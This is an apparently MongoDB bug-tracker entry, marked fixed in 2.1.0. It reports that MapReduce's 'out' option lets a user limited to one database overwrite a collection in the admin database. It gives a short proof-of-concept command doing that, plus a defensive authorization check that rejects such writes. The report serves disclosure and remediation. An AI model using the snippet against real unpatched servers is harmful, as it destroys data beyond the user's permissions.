
[SECURITY] MapReduce able to overwrite any collection in any db regardless of authentication


Details

    • Type: Bug
    • Resolution: Done
    • Priority: Major - P3
    • 2.1.0
    • 2.0.1
    • MapReduce, Security
    • None
    • ALL

    Description

      use admin
      db.addUser("admin", "strongpasswd");
      db.importantCollection.insert(importantData);

      use test
      db.addUser("testUser", "passwd");

      Restart mongod with authentication enabled.

      Now, with the next snippet, you can wipe the admin db's importantCollection:

      use test
      db.auth("testUser", "passwd");
      db.test.insert({foo: "bar"});
      db.runCommand({
          mapreduce: "test",
          map: function Map() {
              emit(this._id, {});
          },
          reduce: function Reduce(key, values) {
              return values[0];
          },
          out: { replace: "importantCollection", db: "admin" }
      });

      In short: you run a M/R on a collection to which you have access, but the output goes to another db's collection that you have no rights to read or write.
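The root cause described above is that the server authorized the map-reduce against the input collection only, while the `out` specification (string form, `{replace|merge|reduce: name}` with an optional `db`, or `{inline: 1}`) decides where the write actually lands. The following is an added illustration, not MongoDB's own code: it resolves the output namespace of a mapreduce command document and requires write privilege on that target database before allowing the command. The privilege model (`grants` keyed by database with a set of `read`/`write` actions) and the `testUser` sample are constructed for the example.

```javascript
// Added example (not MongoDB's code): authorize a mapreduce command against the
// namespace it WRITES to, not only the collection it reads.

// Resolve where a mapreduce "out" specification writes.
// Returns null for inline output, which writes no collection at all.
function resolveMapReduceOutput(cmdDb, cmd) {
  const out = cmd.out;
  if (out === undefined) throw new Error("mapreduce: missing 'out'");
  if (typeof out === "string") {
    // Shorthand form: output collection in the same database as the command.
    return { db: cmdDb, collection: out, mode: "replace" };
  }
  if (typeof out !== "object" || out === null) {
    throw new Error("mapreduce: 'out' must be a string or an object");
  }
  if (out.inline) return null;
  for (const mode of ["replace", "merge", "reduce"]) {
    if (typeof out[mode] === "string") {
      // The optional 'db' field redirects the output to another database;
      // this is exactly the field the report abuses.
      const targetDb = typeof out.db === "string" ? out.db : cmdDb;
      return { db: targetDb, collection: out[mode], mode };
    }
  }
  throw new Error("mapreduce: unrecognised 'out' specification");
}

// Simplified privilege model (constructed for this example):
// principal.grants maps a database name to a Set of actions ("read", "write").
function hasPrivilege(principal, dbName, action) {
  const grants = principal.grants[dbName];
  return grants !== undefined && grants.has(action);
}

// Decide whether the principal may run the command. Returns { allowed, reason }.
function authorizeMapReduce(principal, cmdDb, cmd) {
  // Reading the input collection requires read on the command's database.
  if (!hasPrivilege(principal, cmdDb, "read")) {
    return { allowed: false, reason: `no read on ${cmdDb}.${cmd.mapreduce}` };
  }
  const target = resolveMapReduceOutput(cmdDb, cmd);
  if (target === null) {
    return { allowed: true, reason: "inline output, nothing is written" };
  }
  // The fix the report calls for: the OUTPUT database must be writable too.
  if (!hasPrivilege(principal, target.db, "write")) {
    return { allowed: false, reason: `no write on ${target.db}.${target.collection}` };
  }
  return { allowed: true, reason: `write on ${target.db}.${target.collection}` };
}

// Constructed sample: the report's testUser, with rights only on "test".
const testUser = { name: "testUser", grants: { test: new Set(["read", "write"]) } };

// The command from the report, with functions as source strings (constructed).
const crossDbCmd = {
  mapreduce: "test",
  map: "function () { emit(this._id, {}); }",
  reduce: "function (key, values) { return values[0]; }",
  out: { replace: "importantCollection", db: "admin" },
};

console.log(authorizeMapReduce(testUser, "test", crossDbCmd));
// → { allowed: false, reason: 'no write on admin.importantCollection' }
```

Running the block rejects the cross-database replace while a plain `out: "results"` in the user's own database, or `out: {inline: 1}`, passes; the point is that the authorization decision has to be made on the resolved target namespace, whatever shape the `out` option takes.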

          People

            Assignee: Antoine Girbal (antoine)
            Reporter: György Nagy (benedicht)